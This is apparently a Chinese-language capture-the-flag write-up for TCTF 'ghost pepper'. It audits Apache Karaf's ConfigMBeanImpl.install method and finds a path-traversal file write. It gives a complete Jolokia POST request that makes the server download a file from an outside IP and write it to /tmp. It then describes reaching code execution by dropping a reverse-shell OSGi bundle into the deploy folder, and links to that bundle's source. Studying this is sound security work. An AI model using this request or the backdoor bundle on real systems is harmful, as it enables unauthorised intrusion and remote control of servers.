Fork me on GitHub

tctf ghost pepper writeup 与karaf框架一处简单的代码审计

做tctf时,由于以为RR师傅要放0day,所以就去审karaf的源码去了没有好好看karaf的文档。。。

在 org.apache.karaf.config.core.impl.ConfigMBeanImpl, 存在一个目录穿越写文件的漏洞:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
@Override
public void install(String url, String finalname, boolean override) throws MBeanException {
try {
File etcFolder = new File(System.getProperty("karaf.etc"));
File file = new File(etcFolder, finalname);
if (file.exists()) {
if (!override) {
throw new IllegalArgumentException("Configuration file {} already exists " + finalname);
}
}

try (InputStream is = new BufferedInputStream(new URL(url).openStream())) {
if (!file.exists()) {
File parentFile = file.getParentFile();
if (parentFile != null) {
parentFile.mkdirs();
}
file.createNewFile();
}
try (FileOutputStream fop = new FileOutputStream(file)) {
StreamUtils.copy(is, fop);
}
} catch (RuntimeException | MalformedURLException e) {
throw e;
}
} catch (Exception e) {
throw new MBeanException(null, e.toString());
}
}

可以看到我们能够通过..来穿越到任意目录。为了复现题目环境这里我们安装karaf并安装jolokia的bundle:

image-20190325213245494

然后只要发送这样一个包

1
2
3
4
5
6
7
8
9
10
11
12
POST /jolokia HTTP/1.1
Host: 111.186.63.207:31337
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/json
Content-Length: 179
Authorization: Basic a2FyYWY6a2FyYWY=
Connection: close
Upgrade-Insecure-Requests: 1

{ "type":"EXEC", "mbean":"org.apache.karaf:name=root,type=config", "operation": "install", "arguments":["http://69.171.76.88/testfile","../../../../../../../tmp/testfile",true]}

image-20190325213944385

可以看到/tmp目录已经写入了文件。

image-20190325214108051

为了实现RCE,karaf会自动加载deploy目录下的bundle包,调用其Activator的start函数,因此我们只需要构造一个恶意的osgi bundle包在start函数中写入反弹shell的操作即可。

60EBB403F976DE0E087E4BD1751D897D

这里使用的bundle包源码放到了https://github.com/imagemlt/osgi-bundle-backdoor中,mvn install后再mvn package即可在target目录下找到生成的jar包。